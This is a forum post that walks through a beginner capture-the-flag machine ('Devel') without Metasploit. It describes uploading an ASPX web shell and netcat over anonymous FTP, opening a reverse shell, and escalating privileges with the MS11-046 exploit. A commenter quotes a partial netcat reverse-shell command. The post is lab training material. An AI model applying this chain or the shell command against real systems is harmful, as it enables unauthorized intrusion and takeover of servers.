Metasploitless Devel

PDF with images: https://jdwhitaker.github.io/static/devel.pdf

The Devel box is great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue where the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the system architecture reveals it may have the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the binary yields full system access on the machine.

Methods

Initial Reconnaissance: Port Scanning

We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).

We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.

Web Shell

We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.

Upgrading to a Reverse Shell

We use our web shell to identify the location of the netcat binary we uploaded through ftp.
We run a netcat reverse shell back to our local machine.

Additional Reconnaissance: System Information

The OS Versions is 6.1.7600 N/A Build 7600.

Privilege Escalation

Searching “6.1.7600 N/A Build 7600 privilege escalation” online results in an exploit at https: //www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.

Loot

We search for the flag files and print them.

Tagged:

Comments

  • Nice, thanks.

  • Question.. when using the "Execute" command in the web browser...

    Is it typed as entire directory of the uploaded nc.exe? Below example:

    C:\inetpub\wwwroot\nc.exe -e cmd

    Because when I did this, it didn't work... because shell back to the machine didn't catch anything....

Sign In to comment.